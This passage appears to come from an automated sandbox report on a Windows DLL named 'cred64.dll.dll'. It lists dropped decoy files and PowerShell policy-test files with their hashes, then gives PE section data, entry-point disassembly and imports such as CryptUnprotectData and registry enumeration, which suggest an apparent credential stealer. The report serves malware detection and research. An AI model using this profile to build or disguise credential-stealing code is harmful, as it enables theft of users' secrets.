                                    Preview:SQSJKEBWDTQPYRJUMTXHILYOMMANPJPHHMRHFVWTZEPXAIAVKTSBZRYUTWHNFQIECJFXGKPUTVPJATJGMKUHXJODTESNRMMJTXWENSGOWPBKXVHEEJMAGWUGYELOFGDDMEXBMBPCQOZDIQJHWWTSSVNGZLVHCHBZNJSYUOTWAPZJKFXWFCXQUQCBQYKVYKKKLNXSSSSLGTAFUMEJNHNRUGIMMETQDZKJCJZPRVXTSJLLHAUIPPNLEBPEUBCKHAPQUFAGPBYQCGICNBXZSXWAJNTKCUOBGQDHMCHIJBTKFTHSCPEBQXTOJKUAWTWRXEPYUIVUBKOGJQVRNBCCKFIMUIRPTIPNOIKNYUBFQMLTBCEFKXWKFTLKOEFALEANNDBOMFEYCLJVLOGSDFYCVBHQLAHJAEUYVZUKKYJAFJZPGGRXWJYMLQJGLJJPLVWQZTEJZVFZAIXBTWSNPXWYEWJSPNEXNORNZGESIRMDWDAAOUYCCNJQHBKTFVBSDSYVEQCQSBURVVYQIWJIGTJQDEZYGUHFKDWPAZGTXJFCGXCCHSPAITPOYIKUIZLMXTHWETVEIEWMJFHZRXBWPEKERORJFPHCCESXPZRWMEWGFCALFMDGOIEYAUSWWMBCHUQFBDJAZGNOFCHHPWSPGMHXGUSYBEKNZGGOHLEYLHJOUACYWSDKSJOOWHEPLCCKEWYVGVDSYJISOXMVCTJOSETWHUFBVDRYYAHSNIHPIRACNMMCDXLNSSFMVYGREIDELWCRHNKSOHQZMWMXEQMSXGXGWJQEDVLZMOLCVOBDXALQOHTEQUQCXKBTZHLAPBTYYAAPCTPIOGNQTMUINQRWRUZPUNQRXBMEDXPKAFCNTHZHZNOSMHOZZDSRACZMUSFUZGUJWIHKQKPTYZQWGZAUVTCZBLLEBGRXXRHNYNRCEMXSYIJTSCGAJZWVATKNNHCIBGACCGABGJJVWJDJTYOTKQWITZPWLFTBKVEPEVHMSUDPVSVB

                                    C:\Users\user\AppData\Local\Temp\_Files_\SUAVTZKNFL.docx

                                    Download File
                                    Process:C:\Windows\System32\rundll32.exe
                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1026
                                    Entropy (8bit):4.69422273140364
                                    Encrypted:false
                                    SSDEEP:24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
                                    MD5:A686C2E2230002C3810CB3638589BF01
                                    SHA1:4B764DD14070E52A2AC0458F401CDD5724E714FB
                                    SHA-256:38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
                                    SHA-512:1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
                                    Malicious:false
                                    Preview:SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL

                                    C:\Users\user\AppData\Local\Temp\_Files_\SUAVTZKNFL.xlsx

                                    Download File
                                    Process:C:\Windows\System32\rundll32.exe
                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1026
                                    Entropy (8bit):4.69422273140364
                                    Encrypted:false
                                    SSDEEP:24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
                                    MD5:A686C2E2230002C3810CB3638589BF01
                                    SHA1:4B764DD14070E52A2AC0458F401CDD5724E714FB
                                    SHA-256:38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
                                    SHA-512:1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
                                    Malicious:false
                                    Preview:SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2cbzicsc.uyl.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2u35drnc.yfh.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3qifa4f3.qe4.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5xxu2v52.zci.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_at30zwed.zs2.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e4peltgy.gco.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gqgejf1d.iop.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hc10kp1s.im2.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_memebtph.wp2.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mnhoytzr.gk1.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uhgitgri.rm5.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_um5w1foo.1wh.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    Static File Info

                                    General

                                    File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                    Entropy (8bit):6.466578117942047
                                    TrID:
                                    • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                                    • Win64 Executable (generic) (12005/4) 10.17%
                                    • Generic Win/DOS Executable (2004/3) 1.70%
                                    • DOS Executable Generic (2002/1) 1.70%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                    File name:cred64.dll.dll
                                    File size:1'281'024 bytes
                                    MD5:478cf1466756aec3b32c8cc61fc5c6c6
                                    SHA1:201c3726ce7759de084693759c405d4ff7bf4cd9
                                    SHA256:92c5b1eae5d9f4eb47debd827d3168fb8ab989753262747c04ffee38c010e192
                                    SHA512:2e1e413f02655fec855d081c96ca950701db546a28e4fb66cf5c7593dd39d8eca70882705e82260570193b5e4ecdaec144b2af514144175f1a35ed22f98a3b75
                                    SSDEEP:24576:JO/VvL5QafhQsnoXyaoMferXQ5rnxQBuLv8Y472mfUO9l:I5nfhQzOMoA5rnxHv8Z2Ne
                                    TLSH:89557C0BA36141BCD4BBE1789A175A47F775704603709AEB07E446AA3F13BE19EBE310
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........D................................s.............................................................X.............Rich...........

                                    File Icon

                                    Icon Hash:7ae282899bbab082

                                    Static PE Info

                                    General

                                    Entrypoint:0x1800cfac4
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x180000000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                                    Time Stamp:0x6750AA80 [Wed Dec 4 19:16:16 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:6
                                    OS Version Minor:0
                                    File Version Major:6
                                    File Version Minor:0
                                    Subsystem Version Major:6
                                    Subsystem Version Minor:0
                                    Import Hash:3f175edea93fa7a76a78004d12de2235

                                    Entrypoint Preview

                                    Instruction
                                    dec eax
                                    mov dword ptr [esp+08h], ebx
                                    dec eax
                                    mov dword ptr [esp+10h], esi
                                    push edi
                                    dec eax
                                    sub esp, 20h
                                    dec ecx
                                    mov edi, eax
                                    mov ebx, edx
                                    dec eax
                                    mov esi, ecx
                                    cmp edx, 01h
                                    jne 00007F5B887DAFA7h
                                    call 00007F5B887DB308h
                                    dec esp
                                    mov eax, edi
                                    mov edx, ebx
                                    dec eax
                                    mov ecx, esi
                                    dec eax
                                    mov ebx, dword ptr [esp+30h]
                                    dec eax
                                    mov esi, dword ptr [esp+38h]
                                    dec eax
                                    add esp, 20h
                                    pop edi
                                    jmp 00007F5B887DAE34h
                                    int3
                                    int3
                                    int3
                                    dec eax
                                    and dword ptr [ecx+10h], 00000000h
                                    dec eax
                                    lea eax, dword ptr [0002F048h]
                                    dec eax
                                    mov dword ptr [ecx+08h], eax
                                    dec eax
                                    lea eax, dword ptr [0002F02Dh]
                                    dec eax
                                    mov dword ptr [ecx], eax
                                    dec eax
                                    mov eax, ecx
                                    ret
                                    int3
                                    int3
                                    dec eax
                                    sub esp, 48h
                                    dec eax
                                    lea ecx, dword ptr [esp+20h]
                                    call 00007F5B887DAF77h
                                    dec eax
                                    lea edx, dword ptr [00057E87h]
                                    dec eax
                                    lea ecx, dword ptr [esp+20h]
                                    call 00007F5B887DD4B6h
                                    int3
                                    dec eax
                                    mov dword ptr [esp+10h], ebx
                                    dec eax
                                    mov dword ptr [esp+18h], esi
                                    push edi
                                    dec eax
                                    sub esp, 10h
                                    xor eax, eax
                                    xor ecx, ecx
                                    cpuid
                                    inc esp
                                    mov eax, ecx
                                    inc ebp
                                    xor ebx, ebx
                                    inc esp
                                    mov ecx, ebx
                                    inc ecx
                                    xor eax, 6C65746Eh
                                    inc ecx
                                    xor ecx, 756E6547h
                                    inc esp
                                    mov edx, edx
                                    mov esi, eax
                                    xor ecx, ecx
                                    inc ecx
                                    lea eax, dword ptr [ebx+01h]
                                    inc ebp
                                    or ecx, eax
                                    cpuid
                                    inc ecx
                                    xor edx, 49656E69h
                                    mov dword ptr [esp], eax
                                    inc ebp

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x127e000x58.rdata
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x127e580x8c.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1420000xf8.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1360000xae9c.pdata
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1430000x126c.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x1194c00x70.rdata
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1195300x138.rdata
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0xfe0000x600.rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000xfc7d00xfc8001ea5231ca513959c73edf3ace7d8d325False0.5002552599009901data6.448659544667205IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata0xfe0000x2b31e0x2b400530c685b5c5f4d610487e6878416dbf1False0.4419086434248555data5.690159620129266IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0x12a0000xbb8c0x440061d31a77fefa0f32c01e3f3bc17f6803False0.1189108455882353DOS executable (block device driver \322f\324\377\3772)2.1677539241948747IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .pdata0x1360000xae9c0xb000e4078c360762dca3d61be203aa183883False0.4589621803977273data6.057856540511637IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    _RDATA0x1410000xfc0x200e6b0804fe5391dcc441dbda6a53f9f66False0.326171875data2.4656798618339506IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .rsrc0x1420000xf80x200193fc41b7ab2ce83170d116dba1ce3acFalse0.3359375data2.5236806502270213IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0x1430000x126c0x1400899e8e612e41b578dba238a8e36a5e4bFalse0.425390625data5.2926472964845IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_MANIFEST0x1420600x91XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.8689655172413793

                                    Imports

                                    DLLImport
                                    CRYPT32.dllCryptUnprotectData
                                    KERNEL32.dllGetFullPathNameA, SetEndOfFile, UnlockFileEx, GetTempPathW, CreateMutexW, WaitForSingleObject, CreateFileW, GetFileAttributesW, GetCurrentThreadId, UnmapViewOfFile, HeapValidate, HeapSize, MultiByteToWideChar, Sleep, GetTempPathA, FormatMessageW, GetDiskFreeSpaceA, GetLastError, GetFileAttributesA, GetFileAttributesExW, OutputDebugStringW, CreateFileA, LoadLibraryA, WaitForSingleObjectEx, DeleteFileA, DeleteFileW, HeapReAlloc, CloseHandle, GetSystemInfo, LoadLibraryW, HeapAlloc, HeapCompact, HeapDestroy, UnlockFile, GetProcAddress, CreateFileMappingA, LocalFree, LockFileEx, GetFileSize, DeleteCriticalSection, GetCurrentProcessId, GetProcessHeap, SystemTimeToFileTime, FreeLibrary, WideCharToMultiByte, GetSystemTimeAsFileTime, GetSystemTime, FormatMessageA, CreateFileMappingW, MapViewOfFile, QueryPerformanceCounter, GetTickCount, FlushFileBuffers, SetHandleInformation, FindFirstFileA, Wow64DisableWow64FsRedirection, K32GetModuleFileNameExW, FindNextFileA, CreatePipe, PeekNamedPipe, lstrlenA, FindClose, GetCurrentDirectoryA, lstrcatA, OpenProcess, SetCurrentDirectoryA, CreateToolhelp32Snapshot, ProcessIdToSessionId, CopyFileA, Wow64RevertWow64FsRedirection, Process32NextW, Process32FirstW, CreateThread, CreateProcessA, CreateDirectoryA, WriteConsoleW, InitializeCriticalSection, LeaveCriticalSection, LockFile, OutputDebugStringA, GetDiskFreeSpaceW, WriteFile, GetFullPathNameW, EnterCriticalSection, HeapFree, HeapCreate, TryEnterCriticalSection, ReadFile, AreFileApisANSI, SetFilePointer, ReadConsoleW, SetFilePointerEx, GetFileSizeEx, GetConsoleMode, GetConsoleOutputCP, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, SetStdHandle, GetCurrentDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, InitializeSListHead, LCMapStringEx, InitializeCriticalSectionEx, EncodePointer, DecodePointer, CompareStringEx, GetCPInfo, GetStringTypeW, RtlUnwindEx, RtlPcToFileHeader, RaiseException, InterlockedFlushSList, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ExitProcess, GetModuleFileNameW, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetTimeZoneInformation, GetStdHandle
                                    ADVAPI32.dllRegQueryValueExA, RegEnumValueW, RegEnumKeyA, RegCloseKey, RegQueryInfoKeyW, RegOpenKeyA, RegOpenKeyExA, GetSidSubAuthorityCount, GetSidSubAuthority, GetUserNameA, RegEnumKeyExW, LookupAccountNameA, GetSidIdentifierAuthority
                                    SHELL32.dllSHGetFolderPathA, SHFileOperationA
